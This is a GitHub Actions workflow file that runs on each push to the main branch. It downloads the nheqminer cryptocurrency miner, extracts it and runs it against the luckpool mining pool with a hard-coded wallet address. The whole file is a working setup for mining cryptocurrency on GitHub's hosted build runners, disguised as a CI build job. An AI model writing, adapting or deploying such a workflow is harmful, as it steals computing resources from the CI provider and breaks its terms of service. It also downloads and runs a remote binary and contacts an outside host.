name: Run Nheqminer

on:
  push:
    branches:
      - main  # Change this to the branch you want to trigger the workflow on

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install wget and tar
        run: sudo apt-get update && sudo apt-get install -y wget tar

      - name: Download nheqminer
        run: |
          wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz

      - name: Extract nheqminer
        run: |
          tar -xvf nheqminer-Linux-v0.8.2.tgz

      - name: List extracted files
        run: |
          ls -l  # List files in the current directory

      - name: List files in nheqminer directory
        run: |
          ls -l nheqminer*  # List files in the extracted directory

      - name: Run nheqminer
        run: |
          cd nheqminer*  # Change to the correct directory
          ./nheqminer -v -l na.luckpool.net:3956 -u RP8SNudJuHRv3GJsxb2LJBrKxQKRdKoHL3.kiukiu1 -p x -t 2
